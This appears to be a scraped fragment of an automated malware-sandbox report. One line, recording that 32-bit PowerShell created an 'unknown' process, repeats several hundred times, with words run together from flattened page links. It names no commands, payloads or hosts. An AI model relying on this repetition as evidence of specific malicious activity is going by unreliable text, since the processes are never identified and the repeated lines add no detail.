Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
